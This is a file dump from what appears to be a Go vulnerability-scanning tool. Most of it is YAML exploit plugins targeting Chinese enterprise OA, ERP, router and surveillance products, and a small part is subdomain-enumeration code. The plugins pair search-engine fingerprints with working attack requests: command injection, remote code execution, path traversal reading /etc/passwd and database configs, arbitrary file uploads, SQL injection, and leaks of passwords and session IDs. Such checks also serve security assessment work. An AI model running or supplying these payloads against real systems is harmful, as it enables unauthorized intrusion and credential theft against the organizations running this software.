24 | - Content-Type: application/x-www-form-urlencoded
25 | params: name=admin&password=zabbix&autologin=1&enter=Sign+in
26 | response:
27 | - name: code
28 | value: "302"
29 | type: equals
30 | - name: header
31 | value: 'Location: zabbix.php?action=dashboard.view'
32 | type: contains
33 | create_at: "2022-06-14 14:50:49"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/万户协同办公平台未授权访问漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: ezoffice
2 | query: app:"ezoffice"
3 | meta:
4 | name: 万户协同办公平台未授权访问漏洞
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: 万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 升级至最新版
13 | create_at: "2024-07-13 13:06:19"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /defaultroot/evoInterfaceServlet?paramType=user
23 | redirect: true
24 | header: []
25 | params: ""
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | exploit_steps:
31 | type: ""
32 | params:
33 | name: ""
34 | type: input
35 | value: ""
36 |
--------------------------------------------------------------------------------
/core/plugins/exploits/中国移动 禹路由 敏感信息泄露漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 中移禹路由器
2 | query: body:"中移"
3 | meta:
4 | name: 中国移动禹路由敏感信息泄露漏洞
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: ""
9 | homepage: https://prismx.io/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /cgi-bin/ExportSettings.sh
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: Password
26 | type: contains
27 | create_at: "2022-05-23 11:15:33"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露.yaml:
--------------------------------------------------------------------------------
1 | app: 防火墙
2 | query: body:"var dkey_verify = Get_Verify_Info(hex_md5"
3 | meta:
4 | name: 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: var dkey_verify = Get_Verify_Info(hex_md5
26 | type: contains
27 | create_at: "2022-05-23 14:02:43"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/主动安全监控云平台存在任意文件读取漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 808GPS
2 | query: app:"808GPS"
3 | meta:
4 | name: 主动安全监控云平台存在任意文件读取漏洞
5 | level: 4
6 | tags:
7 | - file_read
8 | description: 未对下载接口设置访问权限导致可下载任意文件
9 | homepage: http://www.g-sky.cn/
10 | author: Prism X
11 | references: ""
12 | solution: 安装补丁
13 | create_at: "2023-10-08 17:09:39"
14 | available: false
15 | steps:
16 | variable: [ ]
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
23 | redirect: true
24 | header: [ ]
25 | params: ""
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: '[DATABASE]'
32 | type: contains
33 | exploit_steps:
34 | type: ""
35 | params:
36 | name: ""
37 | type: input
38 | value: ""
39 |
--------------------------------------------------------------------------------
/core/plugins/exploits/亿邮电子邮件系统远程命令执行.yaml:
--------------------------------------------------------------------------------
1 | app: 亿邮电子邮件系统
2 | query: body:"亿邮电子邮件系统"
3 | meta:
4 | name: 亿邮电子邮件系统远程命令执行
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 亿邮电子邮件系统 存在远程命令执行漏洞,攻击者可以执行任意命令
9 | homepage: https://www.ecshop.com/
10 | author: 一曲成殇
11 | references: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
12 | solution: 升级版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /webadm/?q=moni_detail.do&action=gragh
20 | redirect: true
21 | header:
22 | - name: Content-Type
23 | value: application/x-www-form-urlencoded
24 | params: type='|cat /etc/passwd||'
25 | response:
26 | - name: body
27 | value: /sbin/
28 | type: contains
29 | create_at: "2021-11-09 22:46:26"
30 |
--------------------------------------------------------------------------------
/core/plugins/exploits/大华DSS系统 任意文件下载漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: "大华DSS"
2 | query: title:"DSS-平安城市"
3 | meta:
4 | name: 大华DSS系统 任意文件下载漏洞
5 | level: 3
6 | tags:
7 | - remote_code_execution
8 | description: |-
9 | 浙江大华DSS(digital surveillance system)是一款集视频、报警、门禁、对讲四大安防子系统管理功能于一体的综合管理平台。
10 | 浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。
11 | homepage: https://www.dahuatech.com/
12 | author: Administrator
13 | references: ""
14 | solution: 升级至安全版本
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
22 | redirect: true
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: root
31 | type: contains
32 | create_at: "2022-05-23 11:51:58"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/大华智慧园区综合管理平台_user_getuserinfobyusername_action_账号密码泄漏漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 大华智慧园区综合管理平台
2 | query: app:"大华智慧园区综合管理平台"
3 | meta:
4 | name: 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 安装补丁、升级系统
13 | create_at: "2024-07-12 23:47:58"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /admin/user_getUserInfoByUserName.action?userName=system
23 | redirect: true
24 | header: []
25 | params: ""
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: '"loginPass"'
32 | type: equals
33 | exploit_steps:
34 | type: ""
35 | params:
36 | name: ""
37 | type: input
38 | value: ""
39 |
--------------------------------------------------------------------------------
/core/plugins/exploits/宝塔_7.42版本_pma未授权漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 宝塔
2 | query: title:"安全入口校验失败"
3 | meta:
4 | name: 宝塔 7.42版本 pma未授权漏洞
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: |-
9 | 宝塔介绍:宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA等100多项服务器管理功能
10 | 漏洞介绍:phpmyadmin没加鉴权,可通过poc直接登录
11 | homepage: https://www.bt.cn/
12 | author: 一曲成殇
13 | references: https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A
14 | solution: |-
15 | 修复方案:
16 | 1.立即升级版本
17 | 2.关闭888端口
18 | steps:
19 | verify_steps:
20 | type: and
21 | verify:
22 | - request:
23 | method: GET
24 | path: /pma/
25 | redirect: true
26 | header: [ ]
27 | params: ""
28 | response:
29 | - name: body
30 | value: information_schema
31 | type: contains
32 | create_at: "2021-11-05 23:01:07"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/极通EWEBSphpinfo泄露.yaml:
--------------------------------------------------------------------------------
1 | app: 新软科技-极通EWEBS
2 | query: app:"新软科技-极通EWEBS"
3 | meta:
4 | name: 极通EWEBSphpinfo泄露
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: ""
9 | homepage: http://www.n-soft.com.cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /testweb.php
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: PHP Version
26 | type: contains
27 | create_at: "2022-05-23 14:42:56"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/极通EWEBS任意文件读取.yaml:
--------------------------------------------------------------------------------
1 | app: 新软科技-极通EWEBS
2 | query: app:"新软科技-极通EWEBS"
3 | meta:
4 | name: 极通EWEBS任意文件读取
5 | level: 4
6 | tags:
7 | - file_download
8 | description: ""
9 | homepage: http://www.n-soft.com.cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /casmain.xgi
20 | redirect: false
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: Language_S=../../../../../../../Windows/win.ini
24 | response:
25 | - name: body
26 | value: MAPI=
27 | type: contains
28 | create_at: "2022-05-23 14:41:19"
29 |
--------------------------------------------------------------------------------
/core/plugins/exploits/深信服 行为感知系统 c.php 远程命令执行漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 深信服上网行为管理系统
2 | query: 'body:"isHighPerformance : !!SFIsHighPerformance,"'
3 | meta:
4 | name: 深信服 行为感知系统 c.php 远程命令执行漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /tool/log/c.php?strip_slashes=system&host=ipconfig
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: Windows IP
29 | type: contains
30 | - name: body
31 | value: IPv6
32 | type: contains
33 | create_at: "2022-05-23 15:29:37"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/用友-时空ksoa_imageupload_任意文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 用友软件
2 | query: app:"用友软件"
3 | meta:
4 | name: 用友-时空KSOA ImageUpload 任意文件上传漏洞
5 | level: 4
6 | tags:
7 | - file_upload
8 | description: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 安装补丁
13 | create_at: "2024-07-13 01:31:03"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: POST
22 | path: /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=kaisa.jsp
23 | redirect: true
24 | header: []
25 | params: kaisa
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: kaisa.jsp
32 | type: contains
33 | exploit_steps:
34 | type: ""
35 | params:
36 | name: ""
37 | type: input
38 | value: ""
39 |
--------------------------------------------------------------------------------
/core/plugins/exploits/用友NC_BeanShell远程代码执行漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 用友软件
2 | query: app:"用友软件"
3 | meta:
4 | name: 用友NC BeanShell远程代码执行漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。
9 | homepage: http://www.yonyou.com/
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/aixioxiaoxaio/article/details/117662726
12 | solution: 更新补丁、设置接口访问策略
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /servlet/~ic/bsh.servlet.BshServlet
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: print("hello!");
29 | type: contains
30 | create_at: "2021-11-23 17:51:18"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/用友_U8_OA_test.jsp文件_SQL注入.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: body:"/yyoa/"
3 | meta:
4 | name: 用友 U8 OA test.jsp文件 SQL注入
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: 用友U8-OA存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
9 | homepage: https://www.yonyou.com/
10 | author: 一曲成殇
11 | references: https://jcyj.chd.edu.cn/2021/0312/c5172a183910/page.htm
12 | solution: 删除该页面、升级系统
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: user()
29 | type: contains
30 | create_at: "2021-11-08 09:33:19"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/用友u8c_fileservlet_任意文件读取漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 用友软件
2 | query: app:"用友软件"
3 | meta:
4 | name: 用友U8C FileServlet 任意文件读取漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 用友U8C是一款面向中小企业的ERP软件,为企业提供财务、采购、销售、人力资源、仓储物流等方面的综合管理解决方案。其优秀的功能和服务受到了众多企业的青睐和认可。其FileServlet存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器主机敏感信息。
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 安装补丁、升级至最新版
13 | create_at: "2024-07-13 01:24:08"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==
23 | redirect: true
24 | header: []
25 | params: ""
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: '[fonts]'
32 | type: contains
33 | exploit_steps:
34 | type: ""
35 | params:
36 | name: ""
37 | type: input
38 | value: ""
39 |
--------------------------------------------------------------------------------
/core/plugins/exploits/用友致远u8-oa_getsessionlist_jsp信息泄露.yaml:
--------------------------------------------------------------------------------
1 | app: 用友软件
2 | query: app:"用友软件"
3 | meta:
4 | name: 用友致远U8-OA getSessionList jsp信息泄露
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: 用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。
9 | homepage: https://www.seeyon.com/
10 | author: Administrator
11 | references: https://blog.csdn.net/qq_32261191/article/details/124346940
12 | solution: 升级至安全版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: sessionID
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2022-05-25 10:02:28"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/致远OA webmail.do任意文件下载 CNVD-2020-62422.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: 致远OA webmail.do任意文件下载 CNVD-2020-62422
5 | level: 3
6 | tags:
7 | - file_download
8 | description: 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息
9 | homepage: https://www.seeyon.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: workflow
29 | type: contains
30 | create_at: "2022-05-23 16:52:38"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/致远报表密码泄露.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: 致远报表密码泄露
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: 致远报表任意文件读取造成的密码泄露(采用了帆软报表)
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 安装补丁、升级至最新版
13 | create_at: "2024-07-13 15:47:58"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /seeyonreport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
23 | redirect: true
24 | header: []
25 | params: ""
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: rootManagerPassword
32 | type: contains
33 | exploit_steps:
34 | type: ""
35 | params:
36 | name: ""
37 | type: input
38 | value: ""
39 |
--------------------------------------------------------------------------------
/core/plugins/exploits/蓝凌_oa_金格组件任意文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Landray
2 | query: app:"Landray"
3 | meta:
4 | name: 蓝凌_OA_金格组件任意文件上传漏洞
5 | level: 4
6 | tags:
7 | - file_upload
8 | description: 金格组件存在文件上传漏洞
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 升级至最新版
13 | create_at: "2024-07-13 14:24:11"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: POST
22 | path: /sys/attachment/sys_att_main/jg_service.jsp
23 | redirect: true
24 | header:
25 | - Content-Type: application/x-www-form-urlencoded
26 | params: ""
27 | response:
28 | - name: body
29 | value: java.lang.NumberFormatException
30 | type: contains
31 | exploit_steps:
32 | type: ""
33 | params:
34 | name: ""
35 | type: input
36 | value: ""
37 |
--------------------------------------------------------------------------------
/core/plugins/exploits/蓝凌oa_custom_jsp_任意文件读取漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Landray
2 | query: app:"Landray"
3 | meta:
4 | name: 蓝凌OA custom.jsp 任意文件读取漏洞
5 | level: 4
6 | tags:
7 | - file_read
8 | description: 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 升级至安全版本
13 | create_at: "2024-07-13 14:02:38"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: POST
22 | path: /sys/ui/extend/varkind/custom.jsp
23 | redirect: true
24 | header:
25 | - Content-Type: application/x-www-form-urlencoded
26 | params: var={"body":{"file":"file:///etc/passwd"}}
27 | response:
28 | - name: code
29 | value: "200"
30 | type: equals
31 | - name: body
32 | value: 'root:.*:0:0:'
33 | type: contains
34 | exploit_steps:
35 | type: ""
36 | params:
37 | name: ""
38 | type: input
39 | value: ""
40 |
--------------------------------------------------------------------------------
/core/plugins/exploits/蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.yaml:
--------------------------------------------------------------------------------
1 | app: 蜂网企业流控云路由器
2 | query: app:"蜂网企业流控云路由器"
3 | meta:
4 | name: 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: 蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器
9 | homepage: http://www.ifw8.cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /action/usermanager.htm
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: pwd
29 | type: contains
30 | create_at: "2022-05-23 16:54:34"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/金和editeprint_aspx文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 金和协同管理平台
2 | query: ' app:"金和协同管理平台"'
3 | meta:
4 | name: 金和editeprint.aspx文件上传漏洞
5 | level: 4
6 | tags:
7 | - file_upload
8 | description: ""
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: ""
13 | create_at: "2024-07-13 15:02:30"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /C6/Jhsoft.Web.module/eformaspx/editeprint.aspx?key=writefile&filename=1.ashx&KeyCode=sxfZyQBw8yQ=&designpath=/c6/&typeid=&sPathfceform=./
23 | redirect: true
24 | header: []
25 | params: "123"
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | exploit_steps:
31 | type: ""
32 | params:
33 | name: ""
34 | type: input
35 | value: ""
36 |
--------------------------------------------------------------------------------
/core/plugins/exploits/金和oa_jc6任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | app: 金和协同管理平台
2 | query: app:"金和协同管理平台"
3 | meta:
4 | name: 金和OA JC6任意文件上传
5 | level: 4
6 | tags:
7 | - file_upload
8 | description: 金和OA OfficeServer 任意文件上传,攻击者可通过此漏洞获取服务器权限
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: 升级至最新版本
13 | create_at: "2024-07-13 15:05:34"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: POST
22 | path: /jc6/OfficeServer
23 | redirect: true
24 | header: []
25 | params: "aaccer test 87 0 533 \nDBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\nFILENAME=Li4vLi4vcHVibGljL2VkaXQvaW5mby5qc3A=\n<%out.println(\"only
26 | test\");%"
27 | response:
28 | - name: body
29 | value: aaccer test
30 | type: contains
31 | exploit_steps:
32 | type: ""
33 | params:
34 | name: ""
35 | type: input
36 | value: ""
37 |
--------------------------------------------------------------------------------
/core/plugins/exploits/金山 V8终端安全系统任意文件下载漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: 金山终端安全
2 | query: app:"金山终端安全"
3 | meta:
4 | name: 金山 V8终端安全系统任意文件下载漏洞
5 | level: 4
6 | tags:
7 | - file_download
8 | description: ""
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /htmltopdf/downfile.php?filename=downfile.php
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: filename
29 | type: contains
30 | create_at: "2022-05-23 14:38:57"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/锐捷RG-UAC 账户硬编码漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: RG-UAC
2 | query: title:"RG-UAC登录页面"
3 | meta:
4 | name: 锐捷RG-UAC 账户硬编码漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 锐捷RG-UAC 账户硬编码漏洞
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /get_dkey.php?user=admin
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: password
29 | type: contains
30 | create_at: "2022-05-23 15:17:45"
31 |
--------------------------------------------------------------------------------
/core/subdomain/passive/passive.go:
--------------------------------------------------------------------------------
1 | package passive
2 |
3 | import (
4 | "context"
5 | "prismx_cli/core/subdomain/subscraping"
6 | "strings"
7 | "sync"
8 | "time"
9 | )
10 |
11 | // EnumerateSubdomains enumerates all the subdomains for a given domain
12 | func (a *Agent) EnumerateSubdomains(domain string, keys *subscraping.Keys, maxEnumTime time.Duration) ([]subscraping.Result, error) {
13 |
14 | session, err := subscraping.NewSession(domain, keys, maxEnumTime)
15 | if err != nil {
16 | return nil, err
17 | }
18 |
19 | ctx, cancel := context.WithTimeout(context.Background(), maxEnumTime)
20 | wg := &sync.WaitGroup{}
21 | var results []subscraping.Result
22 |
23 | // 来源目标。
24 | for source, runner := range a.sources {
25 | wg.Add(1)
26 | go func(source string, runner subscraping.Source) {
27 | for resp := range runner.Run(ctx, domain, session) {
28 | resp.Value = strings.ToLower(resp.Value)
29 | results = append(results, resp)
30 | }
31 | wg.Done()
32 | }(source, runner)
33 | }
34 | wg.Wait()
35 | cancel()
36 | return results, nil
37 | }
38 |
--------------------------------------------------------------------------------
/core/subdomain/runner/runner.go:
--------------------------------------------------------------------------------
1 | package runner
2 |
3 | import (
4 | "prismx_cli/core/subdomain/passive"
5 | "prismx_cli/core/subdomain/subscraping"
6 | "time"
7 | )
8 |
9 | type Runner struct {
10 | Target string
11 | Timeout time.Duration
12 | }
13 |
14 | func RunEnumeration(run Runner) ([]subscraping.Result, error) {
15 | agent := passive.New(passive.DefaultAllSources, []string{})
16 | passiveResults, err := agent.EnumerateSubdomains(run.Target, &subscraping.AppKey, run.Timeout*3)
17 | return passiveResults, err
18 | }
19 |
--------------------------------------------------------------------------------
/core/subdomain/subscraping/sources/rapiddns/rapiddns.go:
--------------------------------------------------------------------------------
1 | // Package rapiddns is a RapidDNS Scraping Engine in Golang
2 | package rapiddns
3 |
4 | import (
5 | "context"
6 | "io"
7 | "prismx_cli/core/subdomain/subscraping"
8 | )
9 |
10 | // Source is the passive scraping agent
11 | type Source struct{}
12 |
13 | // Run function returns all subdomains found with the service
14 | func (s *Source) Run(ctx context.Context, domain string, session *subscraping.Session) <-chan subscraping.Result {
15 | results := make(chan subscraping.Result)
16 |
17 | go func() {
18 | defer close(results)
19 |
20 | resp, err := session.SimpleGet(ctx, "https://rapiddns.io/subdomain/"+domain+"?full=1")
21 |
22 | if err != nil {
23 | return
24 | }
25 | defer resp.Body.Close()
26 | body, err := io.ReadAll(resp.Body)
27 | if err != nil {
28 | return
29 | }
30 |
31 | src := string(body)
32 | for _, subdomain := range session.Extractor.FindAllString(src, -1) {
33 | results <- subscraping.Result{Source: s.Name(), Value: subdomain}
34 | }
35 | }()
36 |
37 | return results
38 | }
39 |
40 | // Name returns the name of the source
41 | func (s *Source) Name() string {
42 | return "rapiddns"
43 | }
44 |
--------------------------------------------------------------------------------
/core/subdomain/subscraping/sources/sublist3r/subllist3r.go:
--------------------------------------------------------------------------------
1 | // Package sublist3r logic
2 | package sublist3r
3 |
4 | import (
5 | "context"
6 | "encoding/json"
7 | "fmt"
8 | "prismx_cli/core/subdomain/subscraping"
9 | )
10 |
11 | // Source is the passive scraping agent
12 | type Source struct{}
13 |
14 | // Run function returns all subdomains found with the service
15 | func (s *Source) Run(ctx context.Context, domain string, session *subscraping.Session) <-chan subscraping.Result {
16 | results := make(chan subscraping.Result)
17 |
18 | go func() {
19 | defer close(results)
20 |
21 | resp, err := session.SimpleGet(ctx, fmt.Sprintf("https://api.sublist3r.com/search.php?domain=%s", domain))
22 | if err != nil {
23 | return
24 | }
25 | defer resp.Body.Close()
26 | var subdomains []string
27 | err = json.NewDecoder(resp.Body).Decode(&subdomains)
28 | if err != nil {
29 | return
30 | }
31 |
32 | for _, subdomain := range subdomains {
33 | results <- subscraping.Result{Source: s.Name(), Value: subdomain}
34 | }
35 | }()
36 |
37 | return results
38 | }
39 |
40 | // Name returns the name of the source
41 | func (s *Source) Name() string {
42 | return "sublist3r"
43 | }
44 |
--------------------------------------------------------------------------------
/core/subdomain/subscraping/types.go:
--------------------------------------------------------------------------------
1 | package subscraping
2 |
3 | import (
4 | "context"
5 | "regexp"
6 | "time"
7 |
8 | "go.uber.org/ratelimit"
9 | )
10 |
11 | type Source interface {
12 | Run(context.Context, string, *Session) <-chan Result
13 | Name() string
14 | }
15 |
16 | // Session is the option passed to the source, an option is created
17 | type Session struct {
18 | Timeout time.Duration
19 | Extractor *regexp.Regexp
20 | Keys *Keys
21 | RateLimiter ratelimit.Limiter
22 | }
23 |
24 | // Keys contains the current API Keys we have in store
25 | type Keys struct {
26 | Shodan string
27 | ThreatBook string
28 | Virustotal string
29 | ZoomEyeUserName string
30 | ZoomEyePass string
31 | FofaUsername string
32 | FofaSecret string
33 | HunterUserName string
34 | HunterKey string
35 | FullHunt string
36 | }
37 |
38 | var AppKey Keys
39 |
40 | type Result struct {
41 | Source string
42 | Value string
43 | }
44 |
--------------------------------------------------------------------------------
/images/img.png:
--------------------------------------------------------------------------------
